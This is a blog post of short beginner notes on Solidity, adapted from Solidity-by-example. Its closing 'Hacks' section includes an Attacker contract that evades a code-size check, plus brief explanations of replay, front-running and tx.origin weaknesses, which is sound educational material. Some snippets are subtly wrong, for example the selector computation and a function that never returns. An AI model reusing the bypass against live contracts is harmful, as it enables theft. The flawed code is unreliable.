<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="twitter:card" content="summary_large_image" /><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Solidity-By-Example | EVM Expressions</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="Solidity-By-Example" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Short notes (reminder hooks) about extreme basics of Solidity from Solidity-by-example" />
<meta property="og:description" content="Short notes (reminder hooks) about extreme basics of Solidity from Solidity-by-example" />
<link rel="canonical" href="https://saxenism.com/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html" />
<meta property="og:url" content="https://saxenism.com/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html" />
<meta property="og:site_name" content="EVM Expressions" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-03-09T00:00:00-06:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Solidity-By-Example" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-03-09T00:00:00-06:00","datePublished":"2022-03-09T00:00:00-06:00","description":"Short notes (reminder hooks) about extreme basics of Solidity from Solidity-by-example","headline":"Solidity-By-Example","mainEntityOfPage":{"@type":"WebPage","@id":"https://saxenism.com/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html"},"url":"https://saxenism.com/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="https://saxenism.com/feed.xml" title="EVM Expressions" /><link rel="shortcut icon" type="image/x-icon" href="/images/favicon.ico"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/Primer/15.2.0/primer.css" integrity="sha512-xTz2ys4coGAOz8vuV1NcQBkgVmKhsSEtjbqyMJbBHRplFuvKIUo6xhLHpAyPt9mfR6twHJgn9OgVLuqOvjeBhg==" crossorigin="anonymous" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css" integrity="sha512-1PKOgIY59xJ8Co8+NE6FZ+LOAZKjy+KY8iq0G4B3CyeY6wYHN3yt9PW0XpSriVlkMXe40PTKnXrLnZ9+fkDaog==" crossorigin="anonymous" />

<script>
function wrap_img(fn) {
    if (document.attachEvent ? document.readyState === "complete" : document.readyState !== "loading") {
        var elements = document.querySelectorAll(".post img");
        Array.prototype.forEach.call(elements, function(el, i) {
            if (el.getAttribute("title") && (el.className != "emoji")) {
                const caption = document.createElement('figcaption');
                var node = document.createTextNode(el.getAttribute("title"));
                caption.appendChild(node);
                const wrapper = document.createElement('figure');
                wrapper.className = 'image';
                el.parentNode.insertBefore(wrapper, el);
                el.parentNode.removeChild(el);
                wrapper.appendChild(el);
                wrapper.appendChild(caption);
            }
        });
    } else { document.addEventListener('DOMContentLoaded', fn); }
}
window.onload = wrap_img;
</script>

<script>
    document.addEventListener("DOMContentLoaded", function(){
    // add link icon to anchor tags
    var elem = document.querySelectorAll(".anchor-link")
    elem.forEach(e => (e.innerHTML = '<i class="fas fa-link fa-xs"></i>'));
    });
</script>
</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">EVM Expressions</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About Me</a><a class="page-link" href="/search/">Search</a><a class="page-link" href="/categories/">Tags</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Solidity-By-Example</h1><p class="page-description">Short notes (reminder hooks) about extreme basics of Solidity from Solidity-by-example</p><p class="post-meta post-meta-title"><time class="dt-published" datetime="2022-03-09T00:00:00-06:00" itemprop="datePublished">
        Mar 9, 2022
      </time>
       • <span class="read-time" title="Estimated read time">
    
    
      10 min read
    
</span></p>

    
      <p class="category-tags"><i class="fas fa-tags category-tags-icon"></i></i> 
      
        <a class="category-tags-link" href="/categories/#web3">web3</a>
        &nbsp;
      
        <a class="category-tags-link" href="/categories/#solidity">solidity</a>
        &nbsp;
      
        <a class="category-tags-link" href="/categories/#solidity-by-example">solidity-by-example</a>
        &nbsp;
      
        <a class="category-tags-link" href="/categories/#language-tricks">language-tricks</a>
        &nbsp;
      
        <a class="category-tags-link" href="/categories/#beginner">beginner</a>
        
      
      </p>
    

    </header>

  <div class="post-content e-content" itemprop="articleBody">
    <ul id="toc" class="section-nav">
<li class="toc-entry toc-h2"><a href="#general">General</a></li>
<li class="toc-entry toc-h2"><a href="#constant-vs-immutable">Constant vs Immutable</a></li>
<li class="toc-entry toc-h2"><a href="#inheritence">Inheritence</a></li>
<li class="toc-entry toc-h2"><a href="#shadowing-inherited-state-variables">Shadowing Inherited State Variables</a></li>
<li class="toc-entry toc-h2"><a href="#wei-and-ethere">Wei and Ethere</a></li>
<li class="toc-entry toc-h2"><a href="#gas">Gas</a></li>
<li class="toc-entry toc-h1"><a href="#hacks">Hacks</a>
<ul>
<li class="toc-entry toc-h2"><a href="#bypass-contracrt-code-size-check">Bypass contracrt code size check</a></li>
<li class="toc-entry toc-h2"><a href="#signature-replay-attack">Signature Replay Attack</a></li>
<li class="toc-entry toc-h2"><a href="#blocktimestamp-manipulation">block.timestamp manipulation</a></li>
<li class="toc-entry toc-h2"><a href="#front-running">Front Running</a></li>
<li class="toc-entry toc-h2"><a href="#hiding-malicious-code-with-external-contracts">Hiding malicious code with external contracts</a></li>
<li class="toc-entry toc-h2"><a href="#phishing-with-txnorigin">Phishing with txn.origin</a></li>
<li class="toc-entry toc-h2"><a href="#delegatecalls">delegatecalls</a></li>
</ul>
</li>
</ul><h2 id="general">
<a class="anchor" href="#general" aria-hidden="true"><span class="octicon octicon-link"></span></a>General</h2>

<ol>
  <li>
    <p>Solidity supports if, else and else if statements.</p>
  </li>
  <li>
    <p>Ternary operators are also supported.</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">for</code>, <code class="language-plaintext highlighter-rouge">while</code> and <code class="language-plaintext highlighter-rouge">do while</code> loops are supported. But anything apart from <code class="language-plaintext highlighter-rouge">for</code> is rarely used.</p>
  </li>
</ol>

<p>4.Arrays</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint</span><span class="p">[]</span> <span class="k">public</span> <span class="n">arr</span> <span class="o">=</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">];</span>
<span class="kt">uint</span><span class="p">[]</span> <span class="k">public</span> <span class="n">arr</span><span class="p">;</span>
<span class="kt">uint</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="k">public</span> <span class="n">fixedSizeArr</span><span class="p">;</span>
<span class="c1">// Solidity can also return entire arrays
</span><span class="k">returns</span><span class="p">(</span><span class="kt">uint</span><span class="p">[]</span> <span class="k">memory</span><span class="p">)</span>

<span class="c1">// Creating an array in memory. Only fixed sized arrays can be created
</span>
<span class="k">function</span> <span class="n">createArray</span><span class="p">()</span> <span class="k">public</span> <span class="p">{</span>
    <span class="kt">uint</span><span class="p">[]</span> <span class="k">memory</span> <span class="n">arr</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">uint</span><span class="p">[](</span><span class="mi">5</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Deleting an array element can be done in two ways:
// 1. Maintain array order: Shift all elements post deleted element one place left and pop last element
// 2. Do not maintain array order: Copy last element to the deleted index. Pop the last element.
</span></code></pre></div></div>

<ol>
  <li>Enums</li>
</ol>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="k">enum</span> <span class="n">Status</span> <span class="p">{</span>
    <span class="n">Pending</span><span class="p">,</span>
    <span class="n">Accepted</span><span class="p">,</span>
    <span class="n">EnRoute</span><span class="p">,</span>
    <span class="n">Delievered</span><span class="p">,</span>
    <span class="n">Cancelled</span><span class="p">,</span>
    <span class="n">Refunded</span>
<span class="p">}</span>

<span class="n">Status</span> <span class="k">public</span> <span class="n">status</span><span class="p">;</span> <span class="c1">// Default status is 0, ie, Pending 
</span>
<span class="n">status</span> <span class="o">=</span> <span class="n">Status</span><span class="p">.</span><span class="n">Cancelled</span><span class="p">;</span> <span class="c1">// Setting the status to Cancelled
</span>
<span class="k">delete</span> <span class="n">status</span><span class="p">;</span> <span class="c1">// Resets the status to 0, ie, Pending
</span>
<span class="c1">// A good practice would be to declare all the enums in your project inside a single file and then import that file
// in different files where the enums are to be used.
</span></code></pre></div></div>

<ol>
  <li>
    <p>A maximum of three parameters can be indexed in an event. Indexing helps to sort the given parameter while filtering the logs.</p>
  </li>
  <li>
    <p>To call the parent contracts, either do <code class="language-plaintext highlighter-rouge">parentContract.foo()</code> or use the <code class="language-plaintext highlighter-rouge">super</code> keyword.</p>
  </li>
</ol>

<p>Using <code class="language-plaintext highlighter-rouge">super</code> would call all of the immediate parent contracts.</p>

<ol>
  <li>Interfaces have no state variables, no constructors and no function implementations</li>
</ol>

<p>All functions have to be external and interfaces can inherit.</p>

<p>You can name your function parameters. Like <code class="language-plaintext highlighter-rouge">address owner</code> instead of <code class="language-plaintext highlighter-rouge">address</code>.</p>

<ol>
  <li>The recommended method for sending Ether is <code class="language-plaintext highlighter-rouge">call</code> in combination with <code class="language-plaintext highlighter-rouge">re-entrancy guard</code>.</li>
</ol>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="cm">/*
    Which function is called, fallback() or receive()?

           send Ether
               |
         msg.data is empty?
              / \
            yes  no
            /     \
receive() exists?  fallback()
         /   \
        yes   no
        /      \
    receive()   fallback()
    */</span>

<span class="n">_to</span><span class="p">.</span><span class="nb">transfer</span><span class="p">(</span><span class="n">msg</span><span class="p">.</span><span class="n">value</span><span class="p">);</span>

<span class="kt">bool</span> <span class="n">sent</span> <span class="o">=</span> <span class="n">_to</span><span class="p">.</span><span class="nb">send</span><span class="p">(</span><span class="n">msg</span><span class="p">.</span><span class="n">value</span><span class="p">);</span>

<span class="p">(</span><span class="kt">bool</span> <span class="n">sent</span><span class="p">,</span> <span class="kt">bytes</span> <span class="k">memory</span> <span class="n">data</span><span class="p">)</span> <span class="o">=</span> <span class="n">_to</span><span class="p">.</span><span class="nb">call</span><span class="p">{</span><span class="n">value</span><span class="o">:</span> <span class="n">msg</span><span class="p">.</span><span class="n">value</span><span class="p">}(</span><span class="s">""</span><span class="p">);</span>

</code></pre></div></div>

<p>Also, fallback function cannot take any arguments and cannot return anything.</p>

<ol>
  <li>
    <p><code class="language-plaintext highlighter-rouge">fallback</code> is called when a function that does not exist is called or some Ether is sent without msg.data or recieve function does not exist.</p>
  </li>
  <li>
    <p>Calling other functions with the low-level <code class="language-plaintext highlighter-rouge">call</code></p>
  </li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(bool success, bytes memory data) = _addr.call{value: msg.value, gas: 5000}(abi.encodeWithSignature("foo(string,uint256)", "call foo", 123));
</code></pre></div></div>

<ol>
  <li>
<code class="language-plaintext highlighter-rouge">delegatecall</code> is similar to <code class="language-plaintext highlighter-rouge">call</code> but the difference is if contract A delegates a call to contract B, then the function code of contract B is executed with the storage, msg.sender and msg.value of contract A itself.</li>
</ol>

<p>13.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
function transfer(address _addr, uint256 _amt) {
    // something
}

</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
abi.encodeWithSignature("transfer(address,uint256)");

</code></pre></div></div>

<p>and</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
bytes4 public transferSelector = bytes4(keccak256(bytes4("transfer(address,uint256)")));

</code></pre></div></div>

<p>Same energy</p>

<ol>
  <li>
</ol>

<h2 id="constant-vs-immutable">
<a class="anchor" href="#constant-vs-immutable" aria-hidden="true"><span class="octicon octicon-link"></span></a>Constant vs Immutable</h2>

<p>Both immutable and constant are keywords that can be used on state variables to restrict modifications to their state. The difference is that constant variables can never be changed after compilation, while immutable variables can be set within the constructor.</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="k">pragma</span> <span class="n">solidity</span> <span class="o">&gt;</span><span class="mf">0.6</span><span class="p">.</span><span class="mi">4</span> <span class="o">&lt;</span><span class="mf">0.7</span><span class="p">.</span><span class="mi">0</span><span class="p">;</span>

<span class="k">contract</span> <span class="n">C</span> <span class="p">{</span>
    <span class="kt">uint</span> <span class="k">constant</span> <span class="n">X</span> <span class="o">=</span> <span class="mi">32</span><span class="o">**</span><span class="mi">22</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span>
    <span class="kt">string</span> <span class="k">constant</span> <span class="n">TEXT</span> <span class="o">=</span> <span class="s">"abc"</span><span class="p">;</span>
    <span class="kt">bytes32</span> <span class="k">constant</span> <span class="n">MY_HASH</span> <span class="o">=</span> <span class="nb">keccak256</span><span class="p">(</span><span class="s">"abc"</span><span class="p">);</span>
    <span class="kt">uint</span> <span class="kr">immutable</span> <span class="n">decimals</span><span class="p">;</span>
    <span class="kt">uint</span> <span class="kr">immutable</span> <span class="n">maxBalance</span><span class="p">;</span>
    <span class="kt">address</span> <span class="kr">immutable</span> <span class="n">owner</span> <span class="o">=</span> <span class="n">msg</span><span class="p">.</span><span class="n">sender</span><span class="p">;</span>

    <span class="k">constructor</span><span class="p">(</span><span class="kt">uint</span> <span class="n">_decimals</span><span class="p">,</span> <span class="kt">address</span> <span class="n">_reference</span><span class="p">)</span> <span class="k">public</span> <span class="p">{</span>
        <span class="n">decimals</span> <span class="o">=</span> <span class="n">_decimals</span><span class="p">;</span>
        <span class="c1">// Assignments to immutables can even access the environment.
</span>        <span class="n">maxBalance</span> <span class="o">=</span> <span class="n">_reference</span><span class="p">.</span><span class="nb">balance</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="n">isBalanceTooHigh</span><span class="p">(</span><span class="kt">address</span> <span class="n">_other</span><span class="p">)</span> <span class="k">public</span> <span class="k">view</span> <span class="k">returns</span> <span class="p">(</span><span class="kt">bool</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">_other</span><span class="p">.</span><span class="nb">balance</span> <span class="o">&gt;</span> <span class="n">maxBalance</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>

<p>Compared to regular state variables, the gas costs of constant &amp; immutable variables are much lower.</p>

<p>a) For a constant variable, the expression assigned to it is copied to all the places where it is accessed and also re-evaluated each time. This allows for local optimizations.</p>

<blockquote>
  <p>Reevaluated each time means:
If you have something like, uint area = 2 * PI * 5; 
This will get reevaluated to the exact value at time of pasting the value of PI here.</p>
</blockquote>

<p>b) Immutable variables are evaluated once at construction time and their value is copied to all the places in the code where they are accessed. For these values, 32 bytes are reserved.</p>

<p>-&gt; Due to this, constant values can sometimes be cheaper than immutable values.</p>

<h2 id="inheritence">
<a class="anchor" href="#inheritence" aria-hidden="true"><span class="octicon octicon-link"></span></a>Inheritence</h2>

<ol>
  <li>
    <p>Function that is going to be overriden, must be declared as <code class="language-plaintext highlighter-rouge">virtual</code> and the function that will override a parent function must use the keyword <code class="language-plaintext highlighter-rouge">override</code></p>
  </li>
  <li>
    <p>The order of inheritence in a new contract should go from <em>most-base-like</em> to <em>most-derived</em>.</p>
  </li>
  <li>
    <p>Contracts can inherit from multiple parent contracts. When a function is called that is defined multiple times in different contracts, parent contracts are searched from right to left, and in depth-first manner.</p>
  </li>
</ol>

<h2 id="shadowing-inherited-state-variables">
<a class="anchor" href="#shadowing-inherited-state-variables" aria-hidden="true"><span class="octicon octicon-link"></span></a>Shadowing Inherited State Variables</h2>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="k">contract</span> <span class="n">Parent</span> <span class="p">{</span>
    <span class="kt">uint256</span> <span class="k">public</span> <span class="n">pi</span> <span class="o">=</span> <span class="mi">314</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">contract</span> <span class="n">Child</span> <span class="k">is</span> <span class="n">Parent</span> <span class="p">{</span>

    <span class="c1">// uint256 public pi = 31419; // Would fail
</span>    <span class="c1">// pi = 314159; // Would also fail
</span>
    <span class="k">constructor</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">pi</span> <span class="o">=</span> <span class="mi">314159</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>


</code></pre></div></div>

<h2 id="wei-and-ethere">
<a class="anchor" href="#wei-and-ethere" aria-hidden="true"><span class="octicon octicon-link"></span></a>Wei and Ethere</h2>

<p>Just as <code class="language-plaintext highlighter-rouge">1 ether == 1e18</code>, <code class="language-plaintext highlighter-rouge">1 wei == 1</code></p>

<h2 id="gas">
<a class="anchor" href="#gas" aria-hidden="true"><span class="octicon octicon-link"></span></a>Gas</h2>

<p>Price paid in Ether = Gas Price * Gas spent</p>

<p><em>Gas Price</em> is the amount of Ether you are willing to pay per gas. Usually denoted in gwei, which is equal to 1e9.</p>

<p><em>Gas Spent</em> is the total number of gas spent while doing all the operations required in a particular txn.</p>

<p>Unused gas is refunded.</p>

<p>Two caps of gas:</p>
<ol>
  <li>Block gas limit</li>
  <li>gas limit (that is set by you, ie the maximum gas you are willing to pay for a particular transaction)</li>
</ol>

<h1 id="hacks">
<a class="anchor" href="#hacks" aria-hidden="true"><span class="octicon octicon-link"></span></a>Hacks</h1>

<h2 id="bypass-contracrt-code-size-check">
<a class="anchor" href="#bypass-contracrt-code-size-check" aria-hidden="true"><span class="octicon octicon-link"></span></a>Bypass contracrt code size check</h2>

<p>If a contract implements a function to check the code-size of a particular address, it will write a function similar to this:</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">function</span> <span class="n">isContract</span><span class="p">(</span><span class="kt">address</span> <span class="n">addr</span><span class="p">)</span> <span class="k">public</span> <span class="k">returns</span><span class="p">(</span><span class="kt">bool</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint32</span> <span class="n">codeSize</span><span class="p">;</span>
    <span class="k">assembly</span> <span class="p">{</span>
        <span class="n">codeSize</span> <span class="o">:=</span> <span class="n">extcodesize</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">codeSize</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>But if this function is called by a contract from its constructor, we can bypass this check. Consider this example:</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="k">contract</span> <span class="n">Attacker</span> <span class="p">{</span>
    <span class="kt">bool</span> <span class="k">public</span> <span class="n">isContract</span><span class="p">;</span>

    <span class="k">constructor</span><span class="p">(</span><span class="kt">address</span> <span class="n">_target</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">isContract</span> <span class="o">=</span> <span class="n">Target</span><span class="p">(</span><span class="n">_target</span><span class="p">).</span><span class="n">isContract</span><span class="p">(</span><span class="kt">address</span><span class="p">(</span><span class="nb">this</span><span class="p">));</span>
        <span class="nb">require</span><span class="p">(</span><span class="o">!</span><span class="n">isContract</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>

<h2 id="signature-replay-attack">
<a class="anchor" href="#signature-replay-attack" aria-hidden="true"><span class="octicon octicon-link"></span></a>Signature Replay Attack</h2>

<p>Signing messages off chain and then having a contract that requires that signature before executing a function is a useful technique.</p>

<p>Vulnerability is that the same signature can be used again and again to execute a function.</p>

<p>The ECDSA or the Elliptic Curve Digital Signature Algorithm signatures can be recovered or managed using the ECDSA utility of OZ.
These are often generated using the <code class="language-plaintext highlighter-rouge">web3.eth.sign</code> function and are 65 byte array (of type bytes in Solidity) arranged in the following way:
[[v(1)],[r(32)],[s(32)]]
The data signer can be recovered with ECDSA.</p>

<p>The following code snippet shows how to prevent the signature replay attack:</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="c1">//SPDX-License-Identifier: MIT
</span><span class="k">pragma</span> <span class="n">solidity</span> <span class="mf">0.8</span><span class="p">.</span><span class="mi">14</span><span class="p">;</span>

<span class="k">import</span> <span class="s">"github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v4.5/contracts/utils/cryptography/ECDSA.sol"</span><span class="p">;</span>

<span class="k">contract</span> <span class="n">ReplayAttack</span> <span class="p">{</span>
    <span class="k">using</span> <span class="n">ECDSA</span> <span class="k">for</span> <span class="kt">bytes32</span><span class="p">;</span>

    <span class="kt">address</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">public</span> <span class="n">owners</span><span class="p">;</span>
    <span class="k">mapping</span><span class="p">(</span><span class="kt">bytes32</span> <span class="o">=&gt;</span> <span class="kt">bool</span><span class="p">)</span> <span class="k">public</span> <span class="n">executed</span><span class="p">;</span>

    <span class="k">constructor</span><span class="p">(</span><span class="kt">address</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">memory</span> <span class="n">_owners</span><span class="p">)</span> <span class="k">payable</span> <span class="p">{</span>
        <span class="n">owners</span> <span class="o">=</span> <span class="n">_owners</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="n">deposit</span><span class="p">()</span> <span class="k">external</span> <span class="k">payable</span> <span class="p">{}</span>

    <span class="k">function</span> <span class="nb">transfer</span><span class="p">(</span><span class="kt">address</span> <span class="n">_to</span><span class="p">,</span> <span class="kt">uint256</span> <span class="n">_amount</span><span class="p">,</span> <span class="kt">uint256</span> <span class="n">_nonce</span><span class="p">,</span> <span class="kt">bytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">memory</span> <span class="n">_sigs</span><span class="p">)</span> <span class="k">external</span> <span class="p">{</span>
        <span class="kt">bytes32</span> <span class="n">txHash</span> <span class="o">=</span> <span class="n">getTxHash</span><span class="p">(</span><span class="n">_to</span><span class="p">,</span> <span class="n">_amount</span><span class="p">,</span> <span class="n">_nonce</span><span class="p">);</span>
        <span class="nb">require</span><span class="p">(</span><span class="o">!</span><span class="n">executed</span><span class="p">[</span><span class="n">txHash</span><span class="p">],</span> <span class="s">"Already Executed"</span><span class="p">);</span>
        <span class="nb">require</span><span class="p">(</span><span class="n">_checkSigs</span><span class="p">(</span><span class="n">_sigs</span><span class="p">,</span> <span class="n">txHash</span><span class="p">),</span> <span class="s">"invalid sigs"</span><span class="p">);</span>

        <span class="n">executed</span><span class="p">[</span><span class="n">txHash</span><span class="p">]</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>

        <span class="p">(</span><span class="kt">bool</span> <span class="n">sent</span><span class="p">,</span> <span class="p">)</span> <span class="o">=</span> <span class="n">_to</span><span class="p">.</span><span class="nb">call</span><span class="p">{</span><span class="n">value</span><span class="o">:</span> <span class="n">_amount</span><span class="p">}(</span><span class="s">""</span><span class="p">);</span>
        <span class="nb">require</span><span class="p">(</span><span class="n">sent</span><span class="p">,</span> <span class="s">"Failed to send Ether"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="n">getTxHash</span><span class="p">(</span><span class="kt">address</span> <span class="n">_to</span><span class="p">,</span> <span class="kt">uint256</span> <span class="n">_amount</span><span class="p">,</span> <span class="kt">uint256</span> <span class="n">_nonce</span><span class="p">)</span> <span class="k">public</span> <span class="k">view</span> <span class="k">returns</span><span class="p">(</span><span class="kt">bytes32</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="p">(</span><span class="nb">keccak256</span><span class="p">(</span><span class="n">abi</span><span class="p">.</span><span class="n">encodePacked</span><span class="p">(</span><span class="kt">address</span><span class="p">(</span><span class="nb">this</span><span class="p">),</span> <span class="n">_to</span><span class="p">,</span> <span class="n">_amount</span><span class="p">,</span> <span class="n">_nonce</span><span class="p">)));</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="n">_checkSigs</span><span class="p">(</span><span class="kt">bytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">memory</span> <span class="n">_sigs</span><span class="p">,</span> <span class="kt">bytes32</span> <span class="n">_txHash</span><span class="p">)</span> <span class="k">private</span> <span class="k">view</span> <span class="k">returns</span><span class="p">(</span><span class="kt">bool</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">bytes32</span> <span class="n">ethSignedHash</span> <span class="o">=</span> <span class="n">_txHash</span><span class="p">.</span><span class="n">toEthSignedMessageHash</span><span class="p">();</span>

        <span class="k">for</span><span class="p">(</span><span class="kt">uint</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">_sigs</span><span class="p">.</span><span class="n">length</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="kt">address</span> <span class="n">signer</span> <span class="o">=</span> <span class="n">ethSignedHash</span><span class="p">.</span><span class="n">recover</span><span class="p">(</span><span class="n">_sigs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
            <span class="kt">bool</span> <span class="n">valid</span> <span class="o">=</span> <span class="n">signer</span> <span class="o">==</span> <span class="n">owners</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>

            <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">valid</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>

<h2 id="blocktimestamp-manipulation">
<a class="anchor" href="#blocktimestamp-manipulation" aria-hidden="true"><span class="octicon octicon-link"></span></a>block.timestamp manipulation</h2>

<p>Don’t use block.timestamp as a source of entropy and/or random number.</p>

<p>The miners can manipulate the block.timestamp with the following two constraints:</p>

<ol>
  <li>Block cannot be stamped with a time earlier than it’s parent</li>
  <li>Cannot be too far out in the future.</li>
</ol>

<h2 id="front-running">
<a class="anchor" href="#front-running" aria-hidden="true"><span class="octicon octicon-link"></span></a>Front Running</h2>

<p>Transactions take some time before they are mined.</p>

<p>Transactions not yet mined are put in a transaction pool.</p>

<p>Since transactions with a higher gas price are typically mined first, an attacker who might be watching the mempool, may spot an opportunity to get their own txn included in a block before someone else (might be winning a game, swapping a highly illiquid asset etc) and get significant economical incentives.</p>

<p>Solution:</p>

<ol>
  <li>Use the commit-reveal-distribute scheme when games are involved.</li>
  <li>Use submarine send.</li>
</ol>

<h2 id="hiding-malicious-code-with-external-contracts">
<a class="anchor" href="#hiding-malicious-code-with-external-contracts" aria-hidden="true"><span class="octicon octicon-link"></span></a>Hiding malicious code with external contracts</h2>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// SPDX-License-Identifier: MIT
</span><span class="k">pragma</span> <span class="n">solidity</span> <span class="mf">0.8</span><span class="p">.</span><span class="mi">13</span><span class="p">;</span>

<span class="k">contract</span> <span class="n">A</span> <span class="p">{</span>
    <span class="kt">uint256</span> <span class="k">public</span> <span class="n">testVar</span><span class="p">;</span> <span class="c1">// public will create an automatic getter function
</span><span class="p">}</span>

<span class="k">contract</span> <span class="n">B</span> <span class="p">{</span>
    <span class="kt">uint256</span> <span class="k">public</span> <span class="n">testVar</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span> 
<span class="p">}</span>

<span class="k">contract</span> <span class="n">ProblematicTypecasting</span> <span class="p">{</span>
    <span class="k">function</span> <span class="n">viewTestVar</span><span class="p">(</span><span class="kt">address</span> <span class="n">_addr</span><span class="p">)</span> <span class="k">public</span> <span class="k">view</span> <span class="k">returns</span><span class="p">(</span><span class="kt">uint256</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">A</span><span class="p">(</span><span class="n">_addr</span><span class="p">).</span><span class="n">testVar</span><span class="p">();</span>
        <span class="c1">// Will return 0 or 10 based on whether we pass the deployed address of contract A or B.
</span>    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div></div>

<h2 id="phishing-with-txnorigin">
<a class="anchor" href="#phishing-with-txnorigin" aria-hidden="true"><span class="octicon octicon-link"></span></a>Phishing with txn.origin</h2>

<p>Use msg.sender</p>

<h2 id="delegatecalls">
<a class="anchor" href="#delegatecalls" aria-hidden="true"><span class="octicon octicon-link"></span></a>delegatecalls</h2>

